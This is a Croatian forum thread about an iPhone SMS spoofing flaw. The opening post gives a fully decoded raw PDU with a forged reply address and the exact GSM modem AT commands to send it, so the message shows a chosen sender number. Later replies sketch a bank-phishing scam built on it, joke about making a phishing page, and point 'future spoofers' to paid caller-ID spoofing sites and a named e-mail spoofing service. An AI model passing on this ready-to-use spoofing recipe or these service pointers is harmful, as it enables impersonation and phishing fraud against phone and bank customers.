SMS spoofing - Iphone exploit

poruka: 4
|
čitano: 3.800
|
moderatori: XXX-Man, Lazarus Long, vincimus
1
+/- sve poruke
ravni prikaz
starije poruke gore
12 godina
neaktivan
offline
SMS spoofing - Iphone exploit

Siguran sam da ste posljednjih dana naisli na clanke slicne ovome:

http://www.pod2g.org/2012/08/never-trust-sms-ios-text-spoofing.html

 

Buduci da mnogi moji poznanici posjeduju iPhone, a cujem i mnogi ministri, osjecao sam potrebu ponovo naglasiti: Ne vjeruj SMS porukama!  

 

Iako je ovo vec mnogima poznato, o cemu se radi? Ukratko, ako u UDH (user data header) ubacimo neku reply adresu (broj), iPhone ce prikazati reply broj kao izvorisnu adresu. Jednostavno receno, prilikom prikaza SMS-a iPhone nece prikazati izvorni broj, vec onaj broj koji je naveden kao reply adresa. Npr. pogledajmo ovako sastavljen PDU:

 

069183950104F141000C918395111111110000190A22080C958395212222224A43D16F771934AD0E9753      

 

 

Pojednostavljeno znacenje:

 

06            - duljina SMSC informacije

91            - tip SMSC adrese

83950104F1    - SMSC broj

41            - tip poruke-SMS SUBMIT, User data header-PRESENT

00            - reference number

0C            - duljina broja (12)

91            - tip broja (internacionalni zapis)

839511111111 - broj odredista (naravno, izmjeni se po potrebi)

00            - TP-PID

00            - TP-DCS

19            - User data length

0A            - Use data header length (10 okteta)

22            - Reply Address Element

08            - Bytes Information Element, 0x08 (8 bajtova)

0C            - Duljina reply broja

95            - tip broja

839521222222 - reply broj

4A43D16F7...   - poruka

 

 

Koristeci GSM modem (ili u mom slucaju Nokiu n900) moguce je poslati sms u ovakvom obliku.

 

Nokia-N900:~# pnatd

at

OK

at+cmgf=0

OK

at+cmgs=35

> 069183950104F141000C918395111111110000190A22080C958395212222224A43D16F771934AD0E9753

+CMGS: 179

OK

 

 

Ako pokusate poslati ovakav "sirovi" PDU (uz uvjet da izmjenite odredisni broj), na svome iPhoneu dobit cete poruku koja izgleda kao da je stigla sa broja 385912222222 a glasi: iPhone SUCKS

 

Kao pomoc pri kreiranju "sirovih" poruka mozete koristiti javno dostupan alat: PDUspy

 

Poanta teksta nije dizati paranoju i "Idemo sad svi lazirati SMS poruke", vec osvjestiti korisnike iPhone-a i eventualno se malo nasaliti sa prijateljima :)

 

Pozdrav svim BUG forumasima      

 

 

 

 

 

Poruka je uređivana zadnji put pet 24.8.2012 15:51 (asm).
 
1 0 hvala 0
16 godina
odjavljen
offline
SMS spoofing - Iphone exploit

Cool rupa.

 

Dobiješ SMS od banke (spoofed broj) da ti je račun ugrožen i da se prijaviš na neku "recovery" stranicu čiji je link dan u poruci. Fino klikneš na link, otvori se kopija bankine stranice, ukucaš broj računa, PIN i CCV. Pošto su useri (generalno) ovčice, nasjednu na ovo kao od šale.

 

Idući mjesec račun u maksimalnom dozvoljenom minusu.

 

Well done Apple.

http://nighthawk-software.blogspot.com/
Moj PC  
0 0 hvala 0
12 godina
neaktivan
offline
Re: SMS spoofing - Iphone exploit

Izvrsna konstatacija. Prvo sto sam rekao bliznjima je da banka nikada nece pitati njihov broj racuna, PIN i sl. privatne informacije, no ne vjerujem da me shvacaju ozbiljno. Mislim da cu napraviti phishing stranicu samo da mi pokazem koliko su slabi :)

 

Poruka je uređivana zadnji put sri 29.8.2012 15:21 (asm).
11 godina
protjeran
offline
SMS spoofing - Iphone exploit

Čemu se mučiti sa nekakvim iPhone softverom kada na Internetu imate hrpu stranica za slanje SMS poruka i poziva sa prikazom željenog broja? Istina je da se na  Internetu vrlo teško može naći stranica koja skroz besplatno nudi slanje SMS poruka i poziva sa željenim prikazom broja,ali svatko onaj koji to želi raditi će to onda i rado platiti bez obzira koliko to koštalo. Dakle,skoro sve stranice to naplaćuju,ali vrlo malo. Dakle,ako je nekomu baš u interesu da zove i šalje SMS poruke s lažnim brojem zbog zabave ili kriminala,rado će to platiti i skuplje,ali cijene takvih usluga su zaista vrlo niske. Što se tiče besplatnih stranica,vrlo ih je malo i sve one koje sam ja bio pronašao i koristio su trajno prestale s radom jer nijedan korisnik ništa ne plaća,a te stranice moraju platiti mobilnim i fiksnim operaterima da im zakonski dopuste mjenjanje brojeva telefona. Dakle,bili su na čistom gubitku. 100%-sigurno je to da će i sve ostale besplatne SMS Spoofing stranice prestati s radom zbog istog problema,a to isto očekuje i sve one stranice za besplatne pozive s lažnim brojem.

 

Ono što je puno popularnije je e-mail spoofing. Radi se o istom triku kao i kod SMS poruka - šaljete poruke prikazujući bilo koju adresu. Jedini besplatni servis koji to kvalitetno radi je ovaj: www.emkei.cz

 

Kao što se može vidjeti iz njegove domene,radi se o češkom servisu. Prije pola godine je imao financijskih poteškoća što je se očitovalo i na samoj funkcionalnosti servisa,ali to su ubrzo riješili zahvaljujući brojnim donatorima koji očito jako vole e-mail Spoofing. Dakle,taj servis i dalje nastavlja raditi punom parom zahvaljujući izuzetnoj financijskoj podršci od strane ljubitelja spoofanja,zato ako netko ima potrebu za e-mail spoofingom,jednostavno će morati koristiti ovaj servis jer za razliku od drugih,ovaj servis nema ograničenja i problema,a ima i neke vrlo napredne mogućnosti kao što je prilaganje attachmenta,te biranje željenog vremena slanja kao i biranja odlaznog i dolaznog servera,premda vam za uspješno korištenje ovog servisa ova zadnja opcija neće biti potrebna.

 

Nadam se da sam dao dovoljno informacija budućim spooferima.

 

Poruka je uređivana zadnji put pet 26.9.2014 1:25 (Tehno-Istraživač).
Moj PC  
0 0 hvala 0
1
Nova poruka
E-mail:
Lozinka:
 
vrh stranice